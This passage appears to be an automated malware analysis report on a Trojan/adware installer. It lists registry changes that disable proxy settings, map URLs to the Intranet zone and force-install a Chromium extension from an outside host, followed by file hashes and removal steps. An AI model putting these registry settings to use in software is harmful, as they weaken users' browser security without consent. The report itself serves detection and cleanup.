"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsu5.tmp:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E D0 2B C3 4C 34 E4 3B 47 6E 7A 0B 21 DA 5F 66"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nssF.tmp:1668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 19 FC E3 99 81 E2 B9 B6 A2 B0 64 AC D0 D5 26"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-som-tot-jot-cra-opw-crb-crr"
The process avg23.exe:1836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E 26 73 51 0A 2C 58 9B B3 F2 8A 35 EE 5D E2 6D"
The process %original file name%.exe:1364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E E3 D1 B0 F8 EC 78 9B 7B 84 16 03 1D EF 10 BD"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process adv_128.exe:1660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB 74 92 C1 3A 99 37 3D 39 FA 15 97 8B 06 C1 B0"
[HKLM\SOFTWARE\Policies\Chromium\ExtensionInstallSources]
"1" = "http://ext.internetquickaccess.com/*"
[HKLM\SOFTWARE\Policies\Chromium\ExtensionInstallForcelist]
"1" = "pcjnhdkacfipfoicilllfabpbghiegpn;http://ext.internetquickaccess.com/extensions/internetquickaccess/updates.php?id=pcjnhdkacfipfoicilllfabpbghiegpn"
The process FlashPlayerUpdateService.exe:3536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D EE 0C 75 E4 9E D7 75 10 6E 08 57 88 09 BB 9A"
[HKLM\SOFTWARE\Macromedia\FlashPlayerSAU]
"LastUpdateCheck" = "Type: REG_QWORD, Length: 8"
"UpdateAttempts" = "0"
"CheckFrequency" = "1"
Dropped PE files
MD5 | File path |
---|---|
690f4b16c53bec409e4f465cfb4231a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\6471.exe |
ea76c784fe08389a29306940372ac66a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\6481.exe |
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\6548\setup.exe |
2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uninstall.exe |
a46fd47af97a4430b0fa9ad56eb856d4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\avg23.exe |
db23b6b1b300492d6e8525c80d87e447 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_128.exe |
91baa8204ef1ace5371035f4adacfbd7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf16.tmp |
8574ef2796bdf5b7c82ae981831e45a5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq21.tmp |
e605da91292e59124b415a5d5357c2d0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu5.tmp |
f02155fa3e59a8fc48a74a236b2bb42e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsvB.tmp\inetc.dll |
8217fb536a761fb752904d84de9e773f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\GJ6ZM961\cmmdWriter[1].exe |
0da52b2de8e61350f5291a3da003ceea | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\LRP8nPI[1].exe |
2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\Validate[1].exe |
ea76c784fe08389a29306940372ac66a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\installer[1].exe |
a46fd47af97a4430b0fa9ad56eb856d4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\SilentInstaller_dotnet4[1].exe |
8574ef2796bdf5b7c82ae981831e45a5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\prepreinstaller_win[1].exe |
690f4b16c53bec409e4f465cfb4231a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\setup[1].exe |
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe |
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe |
e6b0bc04dca07169abfc4456c4671307 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\PepperFlash\pepflashplayer.dll |
0bcd0698977726a660321b4fec8f4a5e | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome.dll |
6d64fd7d8a69a39ed4ddcf0cd8d26b4b | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_child.dll |
72f70472e350b35290839f3e2802b4f4 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_elf.dll |
c81e0c917d5db4fecd2ec3c7e2712bbf | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\d3dcompiler_46.dll |
634ec1dc874c89711b94b5c279987d66 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe |
6e98034de60d2e96b4bbb148bbeabadb | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\ffmpegsumo.dll |
17baa5fcf3b9206cc0395a7cc38be7ac | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libegl.dll |
2b8929f7edc2df8925066cb0e7067365 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libexif.dll |
a25f20a5664891bc292970bd23acbf21 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libglesv2.dll |
302f011627a16ce5555e39ec53d4fbdd | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\metro_driver.dll |
814cb49f7706f681723ea9b5746987e4 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\nacl64.exe |
90871478e7b9765cccb884751bfafc7b | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\pdf.dll |
4120c792ee30c922d95c5201cedade29 | c:\Program Files\MyBrowser\MyBrowser\Application\mybrowser.exe |
690f4b16c53bec409e4f465cfb4231a3 | c:\Program Files\MyBrowser\MyBrowser\Application\utility.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nsq18.tmp:1164
6471.exe:1916
chrome.exe:2304
chrome.exe:2268
chrome.exe:2216
chrome.exe:1980
chrome.exe:2252
nsq21.tmp:168
nso13.tmp:508
6481.exe:1988
tmp25.tmp:3448
setup.exe:576
setup.exe:240
tmp24.tmp.exe:1492
nsj1B.tmp:1648
dwwin.exe:2404
nsu5.tmp:468
nssF.tmp:1668
%original file name%.exe:1364
FlashPlayerUpdateService.exe:3536 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\6471.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\ikea.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\bing.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].002 (3985887 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\msn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\ebay.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\netflix.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\youtube.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\etsy.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\search.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\kayak.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\google_translate.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\nba.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].001 (3985887 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].003 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\cnn.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\chrome.packed.7z (1304956 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\icon.json (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\twitter.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\ted.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\facebook.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\reddit.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\espn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\forbes.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\bbc.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo_finance.ico (2993 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\wikipedia.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yandex.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
%WinDir%\Tasks\63266ED-96F7-4DEF-A2CE-178BD4AA43E.job (1644 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\gmail.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\imdb.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\hotels.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\weather_channel.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\mail_live_msn.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\theguardian.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\linkedin.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\expedia.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\target.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo_mail.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\gizmodo.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\pinterest.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo_search.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\google_plus.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\9gag.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\huffingtonpost.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\bestbuy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\tripadvisor.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\priceline.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\skype.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\amazon.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\nfl.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\prefs (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\tumblr.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\setup.exe (37305 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\groupom.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\63266ED-96F7-4DEF-A2CE-178BD4AA43E\63266ED-96F7-4DEF-A2CE-178BD4AA43E.exe (14988 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\booking.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\mail.ru.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\30.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_KyoUMYnZgcIULmW (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\27.tmp (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Favicons (4342 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2C.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\2D.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\GCM Store\LOG (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\README (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Favicons-journal (532 bytes)
